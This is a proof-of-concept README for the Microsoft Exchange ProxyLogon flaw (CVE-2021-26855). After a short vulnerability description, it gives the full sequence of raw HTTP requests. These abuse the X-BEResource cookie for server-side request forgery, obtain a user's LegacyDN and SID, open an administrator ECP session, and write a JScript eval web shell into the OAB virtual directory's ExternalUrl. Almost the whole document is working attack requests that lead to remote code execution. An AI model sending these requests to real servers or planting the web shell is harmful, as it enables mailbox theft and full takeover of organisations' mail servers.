Related vulnerability
Title:
Microsoft Exchange Server code issue vulnerability
(CVE-2021-26855)
Description: Microsoft Exchange Server is an e-mail server product from Microsoft (USA). It provides mail access, storage and forwarding, voice mail, and mail filtering. A security vulnerability exists in Microsoft Exchange Server: an attacker can send crafted HTTP requests that the Exchange front end forwards to back-end services as though the attacker had already authenticated (a server-side request forgery), and can then scan the internal network and obtain sensitive user data. The following products and versions are affected: Microsoft Exchange Server 2013 Cumulative Update 23, Microsoft Exchange
Introduction
# cve-2021-26855
```
# Probe: the X-BEResource cookie tells the front end which back end to proxy this request to (here localhost)
GET /ecp/x.png HTTP/1.1
Host: 192.168.170.134
Cookie: X-BEResource=localhost~1942062522
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close
```
```
# Obtain the LegacyDN: an Autodiscover request relayed to the back end through the X-BEResource cookie
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?; X-BEResource=EXCHANGE01/autodiscover/autodiscover.xml?a=~1942062522
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Content-Type: text/xml
Content-Length: 343
Connection: close

<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
<Request>
<EMailAddress>lili@xihongdream.com</EMailAddress>
<AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
</Request>
</Autodiscover>

# The response contains the user's LegacyDN:
/o=xihongdream/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=e9bf522287a54c07ba1b9a9439f081bc-lili
```
```
# Obtain the user's SID: a MAPI/HTTP emsmdb Connect request with the LegacyDN as its body
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=Administrator@EXCHANGE01.xihongdream.com:444/mapi/emsmdb?MailboxId=f26bc937-b7b3-4402-b890-96c46713e5d5@exchange.lab&a=~1942062522;
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
X-Clientinfo: {2F94A2BF-A2E6-4CCCC-BF98-B5F22C542226}
X-Clientapplication: Outlook/15.0.4815.1002
X-Requestid: {E2EA6C1C-E61B-49E9-9CFB-38184F907552}:123456
X-Requesttype: Connect
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: application/mapi-http
Content-Length: 142
Connection: close

/o=xihongdream/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=e9bf522287a54c07ba1b9a9439f081bc-lili

# The response contains the user's SID:
S-1-5-21-2706396224-3788800485-1262849735-3585
```
```
# Obtain an ECP session: proxyLogon.ecp returns ASP.NET_SessionId and msExchEcpCanary for the SID supplied
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=Administrator@EXCHANGE01.xihongdream.com:444/ecp/proxyLogon.ecp#~1942062522;
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: text/xml; charset=utf-8
Content-Length: 83
Connection: close

<r at="Negotiate" ln=""><s>S-1-5-21-2706396224-3788800485-1262849735-3585</s></r>

# The response sets the two cookies needed for the DDI requests that follow:
ASP.NET_SessionId=c897b0d2-4bc1-40ce-a449-9d65d43276e9;
msExchEcpCanary=jwpquzNMEEyRaXH6LhHEJBqGxCzwG9sIO7BTgjy0e4DxjF0s6fVmLcP-InroQca6cPxscclNbS0.;
-----------------
# Variant: log on with the Administrator SID (RID 500) directly
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=@EXCHANGE01:444/ecp/proxyLogon.ecp#~1942062522;
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: text/xml; charset=utf-8
Content-Length: 348
Connection: close

<r at="Negotiate" ln=""><s>S-1-5-21-2706396224-3788800485-1262849735-500</s></r>
-----------------
# Variant: a logon name plus group SIDs (Everyone, NETWORK, Authenticated Users and a logon-session SID)
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=Administrator@EXCHANGE01.xihongdream:444/ecp/proxyLogon.ecp#~1942062522;
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-20
Content-Type: text/xml; charset=utf-8
Content-Length: 348
Connection: close

<r at="Negotiate" ln="john"><s>S-1-5-21-2706396224-3788800485-1262849735-5529</s><s a="7" t="1">S-1-1-0</s><s a="7" t="1">S-1-5-2</s><s a="7" t="1">S-1-5-11</s><s a="3221225479" t="1">S-1-5-5-0-6948923</s></r>
```
Note that the Content-Length values in these requests were copied from one request to the next and do not match the bodies shown (348 for an 81-byte body, for example); a client must compute Content-Length from the body it actually sends.
```
# Obtain the OAB virtual directory id: DDIService GetList over the ECP session and canary obtained above
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=@EXCHANGE01:444/ecp/DDI/DDIService.svc/GetList?schema=VirtualDirectory&msExchEcpCanary={msExchEcpCanary}&#~1942062522; ASP.NET_SessionId={sessid}; msExchEcpCanary={msExchEcpCanary};
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: application/json; charset=utf-8
Content-Length: 244
Connection: close

{"filter":
{"Parameters":
{
"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"SelectedView": "",
"SelectedVDirType": "OAB"
}
}
}
----------------------------
# Read the OAB virtual directory object (GetObject) with the RawIdentity returned by GetList
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=Administrator@EXCHANGE01:444/ecp/DDI/DDIService.svc/GetObject?schema=OABVirtualDirectory&msExchEcpCanary={msExchEcpCanary}&a=~1942062522; ASP.NET_SessionId={sessid}; msExchEcpCanary={msExchEcpCanary};
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: application/json; charset=utf-8
Content-Length: 244
Connection: close

{
"filter": {
"Parameters": {
"__type":
"JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"SelectedView": "",
"SelectedVDirType": "All"
}
},
"sort": {}
}
```
```
# Write the web shell: SetObject sets the OAB virtual directory's ExternalUrl to the script payload
POST /ecp/x.png HTTP/1.1
Host: 10.255.200.20
Cookie: X-BEResource=@EXCHANGE01:444/ecp/DDI/DDIService.svc/SetObject?schema=OABVirtualDirectory&msExchEcpCanary={msExchEcpCanary}&#~1941962754; ASP.NET_SessionId={sessid}; msExchEcpCanary={msExchEcpCanary};
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
msExchLogonMailbox: S-1-5-21-2706396224-3788800485-1262849735-500
Content-Type: application/json; charset=utf-8
Content-Length: 244
Connection: close

{
"identity": {
"__type": "Identity:ECP",
"DisplayName": "OAB (Default Web Site)",
"RawIdentity": "{oabid}"
},
"properties": {
"Parameters": {
"__type": "JsonDictionaryOfanyType:#Microsoft.Exchange.Management.ControlPanel",
"ExternalUrl": "http://x/#<script language=\"JScript\" runat=\"server\"> function Page_Load(){/**/eval(Request[\"api\"],\"unsafe\");}</script>"
}
}
}
```
`{oabid}` is the RawIdentity returned by the GetList request; the ExternalUrl value must be sent as a JSON string with its inner quotes escaped.
File snapshot
[4.0K] /data/pocs/6d07a9e05dcffa4cb18e279d96c5384c9164b0b9
└── [7.0K] README.md
0 directories, 1 file